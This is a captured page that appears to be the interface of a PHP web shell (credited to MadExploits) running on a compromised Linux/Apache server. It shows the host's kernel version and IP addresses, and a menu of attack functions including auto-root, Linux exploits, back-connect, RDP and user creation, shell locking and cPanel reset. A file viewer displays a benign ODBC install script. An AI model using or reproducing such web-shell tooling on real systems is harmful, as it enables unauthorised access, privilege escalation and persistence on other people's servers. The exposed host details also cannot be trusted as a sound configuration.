Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.188.63.71
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-php-config /
[ HOME SHELL ]
Name
Size
Permission
Action
alt-php-panel-configuration.py
7.42
KB
-rwxr-xr-x
alt-php.cfg
211
B
-rwxr-xr-x
detectcp.py
690
B
-rwxr-xr-x
detectcp.pyc
740
B
-rw-r--r--
install_odbc
526
B
-rwxr-xr-x
multiphp_reconfigure.py
6.24
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install_odbc
#!/bin/sh #dist_ver=$(cat /etc/redhat-release | sed -e 's#[^0-9]*##g' | cut -b1) # add repo conf #curl https://packages.microsoft.com/config/rhel/${dist_ver}/prod.repo > /etc/yum.repos.d/mssql-release.repo cat << EOF > /etc/yum.repos.d/mssql-release.repo [packages-microsoft-com-prod] name=packages-microsoft-com-prod baseurl=https://packages.microsoft.com/rhel/\$releasever/prod/ enabled=1 gpgcheck=1 gpgkey=https://packages.microsoft.com/keys/microsoft.asc EOF # install packages ACCEPT_EULA=Y yum -y install msodbcsql17
Close